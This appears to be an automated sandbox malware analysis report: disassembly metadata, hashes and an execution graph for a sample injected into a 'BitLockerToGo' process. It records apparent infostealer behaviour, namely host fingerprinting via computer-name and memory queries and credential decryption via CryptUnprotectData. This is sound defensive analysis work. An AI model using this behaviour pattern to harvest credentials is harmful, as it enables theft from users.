                              • String ID:
                              • API String ID:
                              • Opcode ID: cc3b3b2a738bfd3b2cc562307a4cda145a911a536f7261e011b7775c0f1e5015
                              • Instruction ID: 11ede97dcfaf981e7d020c530709ce26b103c5efdd6658622540e98fac7a90a2
                              • Opcode Fuzzy Hash: cc3b3b2a738bfd3b2cc562307a4cda145a911a536f7261e011b7775c0f1e5015
                              • Instruction Fuzzy Hash: 63E0C23620A314ABC304A629AC15CD67FAFABC6515704C0A7F50AC7A52DA606D1087F2
                              Function 0637BF70 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3ab27cdbfa65fe5356af98f36797f66e4be99fa33b689e0abe58e88f0bd23913
                              • Instruction ID: d2342341440dd559f44483d52fd2c8418d7d4b64ea0eea6b20c5815b30c9c35d
                              • Opcode Fuzzy Hash: 3ab27cdbfa65fe5356af98f36797f66e4be99fa33b689e0abe58e88f0bd23913
                              • Instruction Fuzzy Hash: 30D0A73260031487C308AA4DA404555B79FEBC8611700C026D50EC3614D970980087C1
                              Function 0637D692 Relevance: .0, Instructions: 12COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 275a5378913f9a63996576ab796c614cce0c34e6005ab1f59236692df76050f6
                              • Instruction ID: 15b15f1d78c8571c64e439a9f7444933adc922452b1d68a0786295ef5b1093b3
                              • Opcode Fuzzy Hash: 275a5378913f9a63996576ab796c614cce0c34e6005ab1f59236692df76050f6
                              • Instruction Fuzzy Hash: F6D0128550D2E15ECB03577959354AA3F71DAA720470E10C7D1C0CF6A3C809865AE777

                              Non-executed Functions

                              Function 063786C0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID: +*$c*
                              • API String ID: 0-4245216306
                              • Opcode ID: 5021a6392c5c3cc094db16b7bc8961ef235b4963ff746b407083b0e092be6771
                              • Instruction ID: f73871cf736fa8e0c5f9d442659b9da36e6c4060bdee525bf85694f8cd72bded
                              • Opcode Fuzzy Hash: 5021a6392c5c3cc094db16b7bc8961ef235b4963ff746b407083b0e092be6771
                              • Instruction Fuzzy Hash: 69910474E01219CFDB64DFA5C994BADBBB2BF4A300F1081A9D409AB355DB346E85CF81
                              Function 06375968 Relevance: 1.8, Strings: 1, Instructions: 536COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID: 0op
                              • API String ID: 0-321085909
                              • Opcode ID: 3335908566fb7d39ee933349421a90a258210845022dfef2e88f999413381f20
                              • Instruction ID: 6e2d19280f5881d75aa9e7b20855330d8341374815d679281f28edf69df2b0a2
                              • Opcode Fuzzy Hash: 3335908566fb7d39ee933349421a90a258210845022dfef2e88f999413381f20
                              • Instruction Fuzzy Hash: 35427E74E01229CFDB64DF65C894BADBBB2BF89300F1085E9D409A7265DB349E85CF90
                              Function 06377A70 Relevance: .4, Instructions: 426COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e6d69cf1e1caea2a1074f592a24d8bbeb2be7eac57765e914dd5ac748f9e8442
                              • Instruction ID: f4954fb48b0410c5325f2b3713ed8b0eb6800f9d3569c07fc54461ae8401d802
                              • Opcode Fuzzy Hash: e6d69cf1e1caea2a1074f592a24d8bbeb2be7eac57765e914dd5ac748f9e8442
                              • Instruction Fuzzy Hash: F8227C74E01229CFDB64DF64C894BD9B7B2AF89300F1085EAD549A7250EB34AEC5CF90
                              Function 063770A0 Relevance: .4, Instructions: 363COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 548e2aebd2a9db7545488f5eba938c9c715e64506708a9b9b576965dbe85381b
                              • Instruction ID: d93d6ac2c6767cc0cd77103c77f37a53e83a55075db95658f13af5b59919e089
                              • Opcode Fuzzy Hash: 548e2aebd2a9db7545488f5eba938c9c715e64506708a9b9b576965dbe85381b
                              • Instruction Fuzzy Hash: 4302B174A01229CFDB68EF64C890B9EB7B2BF89300F1085E9D409A7395DB359E85CF51
                              Function 051C0040 Relevance: .3, Instructions: 315COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d2a5baa865cd4da2459fac1321d2adac653c8a15a7eb91752f912babdcca63b
                              • Instruction ID: 36c0182ed1e15770a0bf88611fbb1507211ac92c83e63a4dd3312c7587dd73fc
                              • Opcode Fuzzy Hash: 6d2a5baa865cd4da2459fac1321d2adac653c8a15a7eb91752f912babdcca63b
                              • Instruction Fuzzy Hash: 4D1296F4C81745CBD330CF65EC4C9897BB1B741398BD24A09DA692B2E1EBB415AACF44
                              Function 06373E38 Relevance: .3, Instructions: 274COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0965ebeaccaf3d0b54055d9e8a5f06f9eb4c580f65c667e1843e8ad1d3089f54
                              • Instruction ID: cdcdba67559657e795a3cc3f84e2cbbc3e321aa2611ab41db561a5ecce3c3f39
                              • Opcode Fuzzy Hash: 0965ebeaccaf3d0b54055d9e8a5f06f9eb4c580f65c667e1843e8ad1d3089f54
                              • Instruction Fuzzy Hash: 2FD1E331C2074ACACB11EFA4D890A99B7B1EF95300F20DB9AE50937251EF706AC4CF91
                              Function 00F7DC74 Relevance: .3, Instructions: 264COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2578317783.0000000000F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F70000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_f70000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bc0508aa0768ca2c6b8b765f8cacf5ff618054480aaf65dea3ffd41a14c06775
                              • Instruction ID: 9a8399f9e8f1d98a054dbc86f49f6f51fc1fbba02b5cdcc0dbb57f740fad34c5
                              • Opcode Fuzzy Hash: bc0508aa0768ca2c6b8b765f8cacf5ff618054480aaf65dea3ffd41a14c06775
                              • Instruction Fuzzy Hash: 64A17C32E00209CFCF05DFB4C88059EB7B2FF84310B25857AE809AB265DB75E959DB81
                              Function 06373E48 Relevance: .3, Instructions: 264COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 319ca5e0308aa89f9955d76e61c7b21bbe5d91481866e37903147db783a31070
                              • Instruction ID: f13095e79285bae04c22ecfd6966e98ab594f360fa3965430c00a006448e0680
                              • Opcode Fuzzy Hash: 319ca5e0308aa89f9955d76e61c7b21bbe5d91481866e37903147db783a31070
                              • Instruction Fuzzy Hash: 4AD1D331D2064ACACB11EFA4C990A99B7B1EF95300F20DB9AE50937254EF706AC4CF91
                              Function 051C0006 Relevance: .2, Instructions: 240COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2588015425.00000000051C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_51c0000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07012fbca1de901d031ad04f40ab4749084280c3c2030f713bbca09eadb559ef
                              • Instruction ID: 42c0fa78d72408dbb1066b7becd3e90a0fdd49ecbba8794444ee73da66855b4f
                              • Opcode Fuzzy Hash: 07012fbca1de901d031ad04f40ab4749084280c3c2030f713bbca09eadb559ef
                              • Instruction Fuzzy Hash: EBC12AB0C81746CFD320CF65EC485897BB1FB85394F924A09D6696F2E1EBB414AACF44
                              Function 06378AD8 Relevance: .2, Instructions: 203COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2590235335.0000000006370000.00000040.00000800.00020000.00000000.sdmp, Offset: 06370000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6370000_dlcdkJcbbV.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bd41ad30a6b82399ee0219e37276a1db4b997939fb499b5dbc824242f4e06671
                              • Instruction ID: 112cd9fbe5fb9bda2989d8989ce0a8ad013649778ddb42bdba48612fa49905ae
                              • Opcode Fuzzy Hash: bd41ad30a6b82399ee0219e37276a1db4b997939fb499b5dbc824242f4e06671
                              • Instruction Fuzzy Hash: 39911674E01218CFCB58DFA5D488AADBBB2FF89301F50806AE409BB354DB359986CF50

                              Execution Graph

                              Execution Coverage:15.8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:13.9%
                              Total number of Nodes:287
                              Total number of Limit Nodes:26
                              execution_graph 11724 3210aa4 11725 3210ada 11724->11725 11747 3202a50 11725->11747 11727 3210beb 11728 321f130 LdrInitializeThunk 11727->11728 11729 3210c04 11728->11729 11730 321fac0 LdrInitializeThunk 11729->11730 11731 3210c24 11730->11731 11732 321fcd0 LdrInitializeThunk 11731->11732 11733 3210c44 11732->11733 11734 32226f0 LdrInitializeThunk 11733->11734 11735 3210c6d 11734->11735 11736 3222b60 LdrInitializeThunk 11735->11736 11737 3210c76 11736->11737 11738 3230030 6 API calls 11737->11738 11745 3210cbf 11738->11745 11739 3202a50 RtlFreeHeap 11739->11745 11740 321f130 LdrInitializeThunk 11740->11745 11741 321fac0 LdrInitializeThunk 11741->11745 11742 321fcd0 LdrInitializeThunk 11742->11745 11743 32226f0 LdrInitializeThunk 11743->11745 11744 3222b60 LdrInitializeThunk 11744->11745 11745->11739 11745->11740 11745->11741 11745->11742 11745->11743 11745->11744 11746 3230030 6 API calls 11745->11746 11746->11745 11748 3202a5e 11747->11748 11755 3202b01 11747->11755 11749 3202b2e 11748->11749 11751 3202a73 11748->11751 11748->11755 11752 3202a50 RtlFreeHeap 11749->11752 11749->11755 11750 3202ab3 11758 3237d92 RtlFreeHeap 11750->11758 11751->11750 11753 3202a50 RtlFreeHeap 11751->11753 11751->11755 11752->11749 11753->11751 11754 3202add 11759 3237d92 RtlFreeHeap 11754->11759 11758->11754 11759->11755 11760 323a5a6 11761 323a5d5 11760->11761 11763 323a63e 11761->11763 11767 3239bc0 LdrInitializeThunk 11761->11767 11765 323a6ee 11763->11765 11766 3239bc0 LdrInitializeThunk 11763->11766 11766->11765 11767->11763 11957 323a165 11958 323a198 11957->11958 11960 323a1fe 11958->11960 11961 3239bc0 LdrInitializeThunk 11958->11961 11961->11960 11962 3217866 11965 3217862 11962->11965 11963 32179a2 CryptUnprotectData 11964 3217610 11963->11964 11963->11965 11965->11962 11965->11963 11768 32350a9 11771 323bc60 11768->11771 11770 32350c1 GetUserDefaultUILanguage 11966 3212a6a 11967 3212a77 11966->11967 11970 3216f50 11967->11970 11969 3212a8a 11971 3216f70 11970->11971 11972 323c7d0 LdrInitializeThunk 11971->11972 11975 321714a 11972->11975 11973 323cb50 LdrInitializeThunk 11973->11975 11974 323cc50 LdrInitializeThunk 11974->11975 11975->11973 11975->11974 11976 32171b9 11975->11976 11977 321727e 11975->11977 11976->11977 11980 3239bc0 LdrInitializeThunk 11976->11980 11979 32177b6 11980->11979 11772 32234b0 11773 3223586 11772->11773 11783 323d000 11773->11783 11776 3223884 11777 322363b 11777->11776 11782 322372c 11777->11782 11793 323da60 11777->11793 11782->11776 11782->11782 11799 3239bc0 LdrInitializeThunk 11782->11799 11800 323c7d0 11782->11800 11785 323d020 11783->11785 11784 322360a 11784->11776 11784->11777 11784->11782 11787 323d400 11784->11787 11785->11784 11804 3239bc0 LdrInitializeThunk 11785->11804 11788 323d435 11787->11788 11790 323d4ae 11788->11790 11805 3239bc0 LdrInitializeThunk 11788->11805 11792 323d58e 11790->11792 11806 3239bc0 LdrInitializeThunk 11790->11806 11792->11777 11794 323da80 11793->11794 11795 323db2e 11794->11795 11807 3239bc0 LdrInitializeThunk 11794->11807 11798 323dc22 11795->11798 11808 3239bc0 LdrInitializeThunk 11795->11808 11798->11782 11799->11782 11801 323c7f0 11800->11801 11802 323c94e 11801->11802 11809 3239bc0 LdrInitializeThunk 11801->11809 11802->11782 11804->11784 11805->11790 11806->11792 11807->11795 11808->11798 11809->11802 11981 3227bf1 11987 323bc60 11981->11987 11983 3227c01 GetComputerNameExA 11984 3227c66 GetComputerNameExA 11983->11984 11986 3227d81 11984->11986 11988 323a7fa 11989 323a81f 11988->11989 11991 323a87e 11989->11991 11994 3239bc0 LdrInitializeThunk 11989->11994 11993 3239bc0 LdrInitializeThunk 11991->11993 11993->11991 11994->11991 11995 32093c0 11997 32093c9 11995->11997 11996 320941d ExitProcess 11999 32093da 11997->11999 12000 320a4b0 11997->12000 11999->11996 12001 320a600 LoadLibraryExW 12000->12001 12002 320a5a3 12000->12002 12003 320a63d 12001->12003 12002->12001 12003->11999 11818 321be00 11819 321be14 11818->11819 11823 321bf25 11818->11823 11824 321bf50 11819->11824 11821 321befc 11821->11823 11828 3219f70 11821->11828 11825 321bfad 11824->11825 11825->11825 11842 323c9a0 11825->11842 11827 321c0cd 11827->11821 11829 321a036 11828->11829 11847 3216b10 11829->11847 11831 321a0a3 11832 3216b10 LdrInitializeThunk 11831->11832 11833 321a1e8 11832->11833 11834 3216b10 LdrInitializeThunk 11833->11834 11835 321a3b1 11834->11835 11836 3216b10 LdrInitializeThunk 11835->11836 11837 321a53d 11836->11837 11838 3216b10 LdrInitializeThunk 11837->11838 11839 321a63c 11838->11839 11840 3216b10 LdrInitializeThunk 11839->11840 11841 321a7a7 11840->11841 11844 323c9c0 11842->11844 11843 323cafe 11843->11827 11844->11843 11846 3239bc0 LdrInitializeThunk 11844->11846 11846->11843 11848 3216b30 11847->11848 11849 323c7d0 LdrInitializeThunk 11848->11849 11850 3216bee 11849->11850 11851 3216c2b 11850->11851 11854 3216e4e 11850->11854 11855 3216c58 11850->11855 11858 3216bff 11850->11858 11866 323cb50 11850->11866 11851->11854 11851->11855 11851->11858 11859 323cc50 11851->11859 11865 3239bc0 LdrInitializeThunk 11854->11865 11855->11854 11855->11858 11870 3239bc0 LdrInitializeThunk 11855->11870 11858->11831 11858->11858 11861 323cc83 11859->11861 11860 323cdde 11860->11855 11863 323ccfe 11861->11863 11871 3239bc0 LdrInitializeThunk 11861->11871 11863->11860 11872 3239bc0 LdrInitializeThunk 11863->11872 11865->11854 11868 323cb85 11866->11868 11867 323cbfe 11867->11851 11868->11867 11873 3239bc0 LdrInitializeThunk 11868->11873 11870->11854 11871->11863 11872->11860 11873->11867 11874 3213a80 11875 3213a89 11874->11875 11878 3219d90 11875->11878 11877 3213a9d 11879 3219db0 11878->11879 11880 323c9a0 LdrInitializeThunk 11879->11880 11881 3219e21 11880->11881 11881->11877 11882 3225681 11883 32251e0 11882->11883 11884 3225684 11882->11884 11885 323c7d0 LdrInitializeThunk 11884->11885 11886 322584f 11885->11886 11887 323980b 11889 323985c LoadLibraryExW 11887->11889 12017 3218349 12018 3218740 12017->12018 12019 3218370 12017->12019 12019->12018 12020 3216b10 LdrInitializeThunk 12019->12020 12021 32187cd 12020->12021 12022 3216b10 LdrInitializeThunk 12021->12022 12023 321886b 12022->12023 12024 3216b10 LdrInitializeThunk 12023->12024 12025 3218934 12024->12025 12026 3216b10 LdrInitializeThunk 12025->12026 12029 32189cc 12026->12029 12028 3216b10 LdrInitializeThunk 12028->12029 12029->12028 12030 3218b94 12029->12030 12031 3235e20 12029->12031 12032 323c7d0 LdrInitializeThunk 12031->12032 12037 3235e52 12032->12037 12035 3235fee 12039 323601a 12035->12039 12044 3238220 12035->12044 12054 3238140 12035->12054 12058 3238010 12035->12058 12037->12035 12038 3235e61 12037->12038 12037->12039 12040 3235f1e 12037->12040 12052 3239bc0 LdrInitializeThunk 12037->12052 12038->12029 12039->12038 12062 3239bc0 LdrInitializeThunk 12039->12062 12040->12035 12053 3239bc0 LdrInitializeThunk 12040->12053 12045 32383fe 12044->12045 12046 323823b 12044->12046 12045->12035 12046->12045 12050 32382de 12046->12050 12063 3239bc0 LdrInitializeThunk 12046->12063 12047 32383ce 12047->12045 12048 3238140 LdrInitializeThunk 12047->12048 12048->12045 12050->12047 12064 3239bc0 LdrInitializeThunk 12050->12064 12052->12040 12053->12035 12055 32381ee 12054->12055 12056 3238156 12054->12056 12055->12035 12056->12055 12065 3239bc0 LdrInitializeThunk 12056->12065 12059 32380fe 12058->12059 12060 3238027 12058->12060 12059->12035 12060->12059 12060->12060 12066 3239bc0 LdrInitializeThunk 12060->12066 12062->12038 12063->12050 12064->12047 12065->12055 12066->12059 12067 32285cc 12068 32285d3 12067->12068 12068->12068 12069 3228705 GetPhysicallyInstalledSystemMemory 12068->12069 12070 322872a 12069->12070 11893 3217293 11894 3217298 11893->11894 11895 323c7d0 LdrInitializeThunk 11894->11895 11896 321741d 11895->11896 12071 3239a51 GetLogicalDrives 12076 321dd55 12077 323c7d0 LdrInitializeThunk 12076->12077 12078 321dde3 12077->12078 11897 3239b15 11898 3239b77 RtlReAllocateHeap 11897->11898 11899 3239b3c 11897->11899 11900 3239ba2 11898->11900 11899->11898 12079 3217bd8 12089 3217c2a 12079->12089 12080 3217fe1 12091 3218280 12080->12091 12081 3217d3b 12086 3218280 RtlFreeHeap 12081->12086 12082 3202a50 RtlFreeHeap 12087 3218073 12082->12087 12084 3217c92 12084->12084 12085 3218280 RtlFreeHeap 12084->12085 12085->12081 12086->12081 12088 3218039 12088->12082 12089->12080 12089->12081 12089->12084 12089->12087 12089->12088 12090 323c9a0 LdrInitializeThunk 12089->12090 12090->12089 12092 321806a 12091->12092 12094 3218073 12091->12094 12093 3202a50 RtlFreeHeap 12092->12093 12093->12094 12094->12088 11901 3220e98 11902 3220ec7 11901->11902 11903 3220e50 11901->11903 11904 3220ed8 11901->11904 11906 32211ec 11901->11906 11902->11904 11902->11906 11908 3221470 11902->11908 11911 322137e 11902->11911 11903->11901 11903->11902 11903->11904 11903->11906 11903->11908 11903->11911 11912 323d710 11903->11912 11905 323d000 LdrInitializeThunk 11905->11908 11906->11906 11906->11911 11918 3239bc0 LdrInitializeThunk 11906->11918 11908->11904 11908->11905 11919 3239bc0 LdrInitializeThunk 11911->11919 11913 323d743 11912->11913 11915 323d7ae 11913->11915 11920 3239bc0 LdrInitializeThunk 11913->11920 11917 323d89e 11915->11917 11921 3239bc0 LdrInitializeThunk 11915->11921 11917->11903 11918->11911 11919->11911 11920->11915 11921->11917 12095 3230859 12096 323085e 12095->12096 12097 323089a KiUserCallbackDispatcher GetSystemMetrics 12096->12097 12098 32308d9 12097->12098 12099 32107db GetSystemDirectoryW 12100 321081c 12099->12100 11922 3221c99 11923 3221e31 11922->11923 11924 323d000 LdrInitializeThunk 11923->11924 11925 3221eb0 11924->11925 11926 3221eeb 11925->11926 11928 323d400 LdrInitializeThunk 11925->11928 11929 3222020 11925->11929 11931 322223a 11925->11931 11934 3221edc 11925->11934 11927 323d000 LdrInitializeThunk 11927->11934 11928->11934 11929->11929 11930 323da60 LdrInitializeThunk 11929->11930 11930->11926 11932 322230e 11931->11932 11945 3239bc0 LdrInitializeThunk 11931->11945 11946 3239bc0 LdrInitializeThunk 11932->11946 11934->11926 11934->11927 11934->11929 11934->11931 11934->11932 11938 323d130 11934->11938 11944 3239bc0 LdrInitializeThunk 11934->11944 11939 323d165 11938->11939 11941 323d1de 11939->11941 11947 3239bc0 LdrInitializeThunk 11939->11947 11943 323d2ce 11941->11943 11948 3239bc0 LdrInitializeThunk 11941->11948 11943->11934 11943->11943 11944->11934 11945->11932 11946->11932 11947->11941 11948->11943 12101 3228b5e 12102 3228b39 12101->12102 12103 3228b72 12101->12103 12103->12103 12104 3228cfe 12103->12104 12106 3239bc0 LdrInitializeThunk 12103->12106 12106->12104 11949 322bb9c 11951 322bba1 11949->11951 11950 322bc76 SysAllocString 11952 322bcd7 11950->11952 11951->11950 11951->11951

                              Executed Functions

                              Function 03227BF1 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 447COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 445 3227bf1-3227c64 call 323bc60 GetComputerNameExA 448 3227c66 445->448 449 3227cbf-3227cc8 445->449 450 3227c70-3227cbd 448->450 451 3227cca-3227cd6 449->451 452 3227ced 449->452 450->449 450->450 454 3227ce0-3227ce9 451->454 453 3227cf3-3227cff 452->453 455 3227d01-3227d07 453->455 456 3227d1b-3227d7f GetComputerNameExA 453->456 454->454 457 3227ceb 454->457 458 3227d10-3227d19 455->458 459 3227d81 456->459 460 3227dff-3227e08 456->460 457->453 458->456 458->458 461 3227d90-3227dfd 459->461 462 3227e0a 460->462 463 3227e1b-3227e27 460->463 461->460 461->461 464 3227e10-3227e19 462->464 465 3227e3b-3227eaa 463->465 466 3227e29-3227e2f 463->466 464->463 464->464 469 3227eff-3227f08 465->469 470 3227eac-3227eaf 465->470 467 3227e30-3227e39 466->467 467->465 467->467 472 3227f0a 469->472 473 3227f1b-3227f27 469->473 471 3227eb0-3227efd 470->471 471->469 471->471 474 3227f10-3227f19 472->474 475 3227f3b-3227faf call 323bc60 473->475 476 3227f29-3227f2f 473->476 474->473 474->474 481 3227fb1 475->481 482 3228005-322800e 475->482 477 3227f30-3227f39 476->477 477->475 477->477 483 3227fc0-3228003 481->483 484 3228010-3228016 482->484 485 322802b-3228038 482->485 483->482 483->483 486 3228020-3228029 484->486 487 3228059-3228065 485->487 486->485 486->486 488 3228104-3228107 487->488 489 322806b-3228072 487->489 492 322810d-322815c 488->492 490 3228040-3228045 489->490 491 3228074-322808c 489->491 493 322804a-3228053 490->493 494 32280c0-32280c8 491->494 495 322808e-3228091 491->495 496 32281a1-32281aa 492->496 497 322815e-322815f 492->497 493->487 500 3228109-322810b 493->500 494->493 502 32280ca-32280ff 494->502 495->494 501 3228093-32280b0 495->501 498 32281cb-32281ce call 322de30 496->498 499 32281ac-32281b2 496->499 503 3228160-322819f 497->503 506 32281d3-32281f1 498->506 504 32281c0-32281c9 499->504 500->492 501->493 502->493 503->496 503->503 504->498 504->504
                              APIs
                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 03227C27
                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 03227D39
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: ComputerName
                              • String ID: JlRw
                              • API String ID: 3545744682-3536621128
                              • Opcode ID: fc0067e6e6baa580be7299bf3664c7914074acdaa95e4f218885a9fa908d6628
                              • Instruction ID: 2deee72115e48d75cef2784db997b9be59d2b6f295e86ff39e742b93974fa4e6
                              • Opcode Fuzzy Hash: fc0067e6e6baa580be7299bf3664c7914074acdaa95e4f218885a9fa908d6628
                              • Instruction Fuzzy Hash: A4F15A70554B939FD325CF38C890BE3BBE1AF16309F08496DD0EA8B682D775A549CB90
                              Function 0323980B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryExW.KERNELBASE(439141DC,00000000,00000800), ref: 0323997E
                              Strings
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID: uvw
                              • API String ID: 1029625771-3462500642
                              • Opcode ID: b82d6ea795be66499aa05758078fc83f731c34ec41684e5ac68959308b99b8be
                              • Instruction ID: a22b2167f5040d4c87845848ae1dd0ca545e96c67af758a1d6f013e978846bf4
                              • Opcode Fuzzy Hash: b82d6ea795be66499aa05758078fc83f731c34ec41684e5ac68959308b99b8be
                              • Instruction Fuzzy Hash: CF417C741283419BE308DF19D5A072EFBE1AF96604F188E0DE4C25B285C7759846CF8A
                              Function 03217866 Relevance: 1.6, APIs: 1, Instructions: 146encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 032179B9
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: CryptDataUnprotect
                              • String ID:
                              • API String ID: 834300711-0
                              • Opcode ID: 8dc2556168af8a0e3d6b34decc298e34158e0e51958383d451bc05fcd65c956d
                              • Instruction ID: 250b02c9d5ab0df34e7d23a960c921417f85efe486dfa9970ed17c4b97889d42
                              • Opcode Fuzzy Hash: 8dc2556168af8a0e3d6b34decc298e34158e0e51958383d451bc05fcd65c956d
                              • Instruction Fuzzy Hash: 0F413AB59183428FC714CF2CC49062FB7E1AFE9304F19496DE5958B352D770D895CB82
                              Function 03239B15 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlReAllocateHeap.NTDLL(?,00000000,?,00000000), ref: 03239B87
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: e9e36eb1a774eb3ae1d54c0c822c3674bfb3f6b6a7959569611035ac6f82814d
                              • Instruction ID: cf6f00a572bf189030516de87a6fba1de1a42aad54b48b96e8d4355f4daf31f0
                              • Opcode Fuzzy Hash: e9e36eb1a774eb3ae1d54c0c822c3674bfb3f6b6a7959569611035ac6f82814d
                              • Instruction Fuzzy Hash: 321169726011409FE720CF18C8A0B55FBF2FF9A310F29896DE1858B292C772A895CB80
                              Function 03239BC0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(0323C97C,005C003F,00000006,00120089,?,00000018,F0F18E8F,00000000,03216BEE), ref: 03239BE6
                              Memory Dump Source
                              • Source File: 00000009.00000002.2819740944.0000000003200000.00000040.00000400.00020000.00000000.sdmp, Offset: 03200000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_9_2_3200000_BitLockerToGo.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                              • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                              • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                              • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
